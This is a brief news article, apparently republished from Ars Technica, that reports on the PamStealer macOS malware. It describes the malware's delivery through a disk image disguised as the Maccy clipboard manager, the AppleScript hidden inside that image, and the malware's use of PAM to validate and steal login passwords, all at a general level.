Home/News/New PamStealer Malware Targets macOS Credentials
Ars Technica2 min read

New PamStealer Malware Targets macOS Credentials

New PamStealer Malware Targets macOS Credentials

Researchers have identified a novel macOS malware, dubbed PamStealer, which employs sophisticated techniques to stealthily steal user credentials. The malware operates in two distinct stages. The initial stage is disseminated via a disk image disguised as Maccy, a popular clipboard manager for macOS. This disk image contains an AppleScript that facilitates the delivery of the second stage of the attack.

PamStealer's name derives from its use of the Pluggable Authentication Modules (PAM) interface, a core component of macOS responsible for user authentication. The malware, written in Rust, leverages PAM to validate a target user's login password. Once validated, this sensitive information is then transmitted to a server controlled by the attackers.

The combination of a disk image and AppleScript for distribution is a known tactic in macOS malware. However, PamStealer distinguishes itself by integrating these elements to achieve a higher degree of stealth. When the AppleScript is executed, it opens within the macOS Script Editor, with its malicious code intentionally concealed deep within the file's structure, making it harder for security software and users to detect.

This multi-faceted approach, combining social engineering through a disguised application and advanced technical methods like PAM exploitation, highlights the evolving threat landscape for macOS users. The malware's ability to bypass typical detection mechanisms and directly target authentication credentials poses a significant risk to user data security.

Original source — read the full reporting at the publisher:

Read on Ars Technica

Read next